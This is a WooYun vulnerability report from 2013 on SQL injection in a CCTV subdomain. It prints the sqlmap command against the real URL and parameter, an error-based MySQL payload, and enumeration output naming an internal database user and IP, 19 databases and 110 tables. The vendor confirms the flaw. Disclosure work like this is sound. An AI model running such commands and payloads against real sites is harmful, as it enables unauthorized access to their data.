当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046564

漏洞标题:中国网络电视台某站点存在SQL注射漏洞导致信息泄漏

相关厂商:中国网络电视台

漏洞作者: Mr.leo

提交时间:2013-12-20 17:49

修复时间:2014-02-03 17:50

公开时间:2014-02-03 17:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-20: 细节已通知厂商并且等待厂商处理中
2013-12-20: 厂商已经确认,细节仅向厂商公开
2013-12-30: 细节向核心白帽子及相关领域专家公开
2014-01-09: 细节向普通白帽子公开
2014-01-19: 细节向实习白帽子公开
2014-02-03: 细节向公众公开

简要描述:

中国网络电视台3#某站点存在SQL注射漏洞导致信息泄漏

详细说明:

站点:
http://deskadmin.cctv.com cctv新闻聚焦
多个参数没有过滤,导致注射

123.png


以localid为例,其他厂商也都修复一下吧。
sqlmap.py -u "http://deskadmin.cctv.com/playsort.php?localid=60" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 0 HTTP(s) requ
sts:
---
Place: GET
Parameter: localid
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: localid=60 AND (SELECT 1095 FROM(SELECT COUNT(*),CONCAT(0x3a626a69
a,(SELECT (CASE WHEN (1095=1095) THEN 1 ELSE 0 END)),0x3a6c706e3a,FLOOR(RAND(0)
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[17:27:16] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.1, PHP 5.3.15
back-end DBMS: MySQL 5.0
[17:27:16] [INFO] fetching current user
[17:27:16] [INFO] resumed: cntv_dev@10.70.58.11
current user: 'cntv_dev@10.70.58.11'
[17:27:16] [INFO] fetching current database
[17:27:16] [INFO] resumed: desk_center
current database: 'desk_center'
[17:27:16] [INFO] fetching database names
[17:27:16] [INFO] the SQL query used returns 19 entries
[17:27:16] [INFO] resumed: information_schema
[17:27:16] [INFO] resumed: banqian_center
[17:27:16] [INFO] resumed: banqian_center_uc
[17:27:16] [INFO] resumed: cntv_survey
[17:27:16] [INFO] resumed: cntv_videodata
[17:27:16] [INFO] resumed: demo
[17:27:16] [INFO] resumed: desk_center
[17:27:16] [INFO] resumed: desk_center_uc
[17:27:16] [INFO] resumed: docuchina
[17:27:16] [INFO] resumed: football_topic
[17:27:16] [INFO] resumed: fortune_db
[17:27:16] [INFO] resumed: ich_bbs
[17:27:16] [INFO] resumed: ich_cms
[17:27:16] [INFO] resumed: ich_ucenter
[17:27:16] [INFO] resumed: mysql
[17:27:16] [INFO] resumed: news_center
[17:27:16] [INFO] resumed: news_center_uc
[17:27:16] [INFO] resumed: test
[17:27:16] [INFO] resumed: worldcup
available databases [19]:
[*] banqian_center
[*] banqian_center_uc
[*] cntv_survey
[*] cntv_videodata
[*] demo
[*] desk_center
[*] desk_center_uc
[*] docuchina
[*] football_topic
[*] fortune_db
[*] ich_bbs
[*] ich_cms
[*] ich_ucenter
[*] information_schema
[*] mysql
[*] news_center
[*] news_center_uc
[*] test
[*] worldcup
Database: desk_center
[110 tables]
+--------------------------+
| `[Table]ads` |
| `[Table]announcements` |
| `[Table]article` |
| `[Table]attachments` |
| `[Table]attachmenttypes` |
| `[Table]blocks` |
| `[Table]cache_0` |
| `[Table]cache_1` |
| `[Table]cache_3` |
| `[Table]cache_4` |
| `[Table]cache_6` |
| `[Table]cache_7` |
| `[Table]cache_8` |
| `[Table]cache_9` |
| `[Table]cache_b` |
| `[Table]cache_c` |
| `[Table]cache_e` |
| `[Table]cache` |
| `[Table]categories` |
| `[Table]channels` |
| `[Table]companys` |
| `[Table]corpus` |
| `[Table]crons` |
| `[Table]customfields` |
| `[Table]effects` |
| `[Table]favorites` |
| `[Table]flashad` |
| `[Table]friendlinks` |
| `[Table]friends` |
| `[Table]goodsprice` |
| `[Table]groupfields` |
| `[Table]groupinvite` |
| `[Table]groupitems` |
| `[Table]groups` |
| `[Table]groupuid` |
| `[Table]guestbooks` |
| `[Table]hrcategories` |
| `[Table]hrcomments` |
| `[Table]hrfolders` |
| `[Table]hritems` |
| `[Table]hrmessage` |
| `[Table]hrrates` |
| `[Table]itemtypes` |
| `[Table]liuyan` |
| `[Table]lovecategories` |
| `[Table]lovecomments` |
| `[Table]lovefolders` |
| `[Table]loveitems` |
| `[Table]lovemessage` |
| `[Table]loverates` |
| `[Table]members` |
| `[Table]modelcolumns` |
| `[Table]modelinterval` |
| `[Table]modelperm` |
| `[Table]models` |
| `[Table]moviecategories` |
| `[Table]moviecomments` |
| `[Table]moviefolders` |
| `[Table]movieitems` |
| `[Table]moviemessage` |
| `[Table]movierates` |
| `[Table]partycategories` |
| `[Table]partycomments` |
| `[Table]partyfolders` |
| `[Table]partyitems` |
| `[Table]partymessage` |
| `[Table]partyrates` |
| `[Table]playstat` |
| `[Table]polls` |
| `[Table]prefields` |
| `[Table]receivemessage` |
| `[Table]reportlist` |
| `[Table]reports` |
| `[Table]robotitems` |
| `[Table]robotlog` |
| `[Table]robotmessages` |
| `[Table]robots` |
| `[Table]rss` |
| `[Table]sendmessage` |
| `[Table]sessions` |
| `[Table]settings` |
| `[Table]sitemaplogs` |
| `[Table]spaceblogs` |
| `[Table]spacecache` |
| `[Table]spacecomments` |
| `[Table]spacefiles` |
| `[Table]spacegoods` |
| `[Table]spaceimages` |
| `[Table]spaceitems` |
| `[Table]spacelinks` |
| `[Table]spacenews` |
| `[Table]spacetags` |
| `[Table]spacevideos` |
| `[Table]styles` |
| `[Table]tagcache` |
| `[Table]tags` |
| `[Table]topicelements` |
| `[Table]topics` |
| `[Table]tracks` |
| `[Table]usercss` |
| `[Table]userfields` |
| `[Table]usergroups` |
| `[Table]userlinks` |
| `[Table]userprofile` |
| `[Table]userspacefields` |
| `[Table]userspaces` |
| `[Table]videos` |
| `[Table]visitors` |
| `[Table]words` |
| `[Table]ziliaoku` |
+--------------------------+
萝卜
各种信息侧漏

345.png


567.png


123123.png


over

漏洞证明:

Database: desk_center
[110 tables]
+--------------------------+
| `[Table]ads` |
| `[Table]announcements` |
| `[Table]article` |
| `[Table]attachments` |
| `[Table]attachmenttypes` |
| `[Table]blocks` |
| `[Table]cache_0` |
| `[Table]cache_1` |
| `[Table]cache_3` |
| `[Table]cache_4` |
| `[Table]cache_6` |
| `[Table]cache_7` |
| `[Table]cache_8` |
| `[Table]cache_9` |
| `[Table]cache_b` |
| `[Table]cache_c` |
| `[Table]cache_e` |
| `[Table]cache` |
| `[Table]categories` |
| `[Table]channels` |
| `[Table]companys` |
| `[Table]corpus` |
| `[Table]crons` |
| `[Table]customfields` |
| `[Table]effects` |
| `[Table]favorites` |
| `[Table]flashad` |
| `[Table]friendlinks` |
| `[Table]friends` |
| `[Table]goodsprice` |
| `[Table]groupfields` |
| `[Table]groupinvite` |
| `[Table]groupitems` |
| `[Table]groups` |
| `[Table]groupuid` |
| `[Table]guestbooks` |
| `[Table]hrcategories` |
| `[Table]hrcomments` |
| `[Table]hrfolders` |
| `[Table]hritems` |
| `[Table]hrmessage` |
| `[Table]hrrates` |
| `[Table]itemtypes` |
| `[Table]liuyan` |
| `[Table]lovecategories` |
| `[Table]lovecomments` |
| `[Table]lovefolders` |
| `[Table]loveitems` |
| `[Table]lovemessage` |
| `[Table]loverates` |
| `[Table]members` |
| `[Table]modelcolumns` |
| `[Table]modelinterval` |
| `[Table]modelperm` |
| `[Table]models` |
| `[Table]moviecategories` |
| `[Table]moviecomments` |
| `[Table]moviefolders` |
| `[Table]movieitems` |
| `[Table]moviemessage` |
| `[Table]movierates` |
| `[Table]partycategories` |
| `[Table]partycomments` |
| `[Table]partyfolders` |
| `[Table]partyitems` |
| `[Table]partymessage` |
| `[Table]partyrates` |
| `[Table]playstat` |
| `[Table]polls` |
| `[Table]prefields` |
| `[Table]receivemessage` |
| `[Table]reportlist` |
| `[Table]reports` |
| `[Table]robotitems` |
| `[Table]robotlog` |
| `[Table]robotmessages` |
| `[Table]robots` |
| `[Table]rss` |
| `[Table]sendmessage` |
| `[Table]sessions` |
| `[Table]settings` |
| `[Table]sitemaplogs` |
| `[Table]spaceblogs` |
| `[Table]spacecache` |
| `[Table]spacecomments` |
| `[Table]spacefiles` |
| `[Table]spacegoods` |
| `[Table]spaceimages` |
| `[Table]spaceitems` |
| `[Table]spacelinks` |
| `[Table]spacenews` |
| `[Table]spacetags` |
| `[Table]spacevideos` |
| `[Table]styles` |
| `[Table]tagcache` |
| `[Table]tags` |
| `[Table]topicelements` |
| `[Table]topics` |
| `[Table]tracks` |
| `[Table]usercss` |
| `[Table]userfields` |
| `[Table]usergroups` |
| `[Table]userlinks` |
| `[Table]userprofile` |
| `[Table]userspacefields` |
| `[Table]userspaces` |
| `[Table]videos` |
| `[Table]visitors` |
| `[Table]words` |
| `[Table]ziliaoku` |
+--------------------------+

修复方案:

过滤多个参数

版权声明:转载请注明来源 Mr.leo@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-12-20 18:06

厂商回复:

非常感谢,我们将尽快进行该业务的整改!~~感谢您对我们的支持和帮助!~~~

最新状态:

暂无